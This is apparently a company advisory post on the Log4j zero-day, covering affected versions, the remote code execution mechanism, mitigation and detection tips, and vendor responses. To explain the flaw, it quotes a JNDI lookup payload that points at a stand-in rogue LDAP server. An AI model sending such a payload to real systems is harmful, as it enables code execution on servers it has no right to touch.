Last Friday morning NCSC/GovCERT.ch reported that a new Zero-Day vulnerability has been found. CVSS Scored 10 points on criticality in a popular Java library called “Log4j” – a really common logging system used by developers of web and server applications based on Java and other programming languages.
According to Cisco, the vulnerability affects a broad range of services and applications on servers, making it extremely dangerous—and the latest updates for those server applications urgent.
But the vulnerability is also kind of complex: While certain products may be vulnerable, it doesn’t necessarily mean that the vulnerability can be successfully exploited as this depends on several pre-and post-conditions such as the JVM being used, the actual configuration, etc. Any version of log4j between versions 2.0 and 2.14.1 is affected.
How the exploit works
As the Swiss Government Computer Emergency Response Team mentioned, the vulnerability impacts from how log messages are being handled by the log4j processor. If an attacker sends a specially crafted message (it contains a string like ${jndi:ldap://rogueldapserver.com/a}), this may result in loading an external code class or message lookup and the execution of that code, leading to a situation that is known as Remote Code Execution (RCE).
Mitigations
Make sure that you have permission from the server’s owner for a penetration test. To detect a vulnerable endpoint, trigger a DNS query, using an Open Source web app like CanaryTokens.org.
Limit the vulnerability from future attacks
Focus first on internet-facing services and follow any update instructions. Get an overview of systems and software using log4j in your environment.
SophosLabs has already deployed a number of IPS signatures that scan for traffic attempting to exploit the Log4J vulnerability. The Sophos Managed Threat Response (MTR) team is actively monitoring MTR customer accounts for post-exploit activity. Sophos XDR customers can use a query to help identify vulnerable Log4J components in their environment.
Our DaaS platform has been already patched and our BaaS providers secured. We will continue to follow how Log4J affects the industries.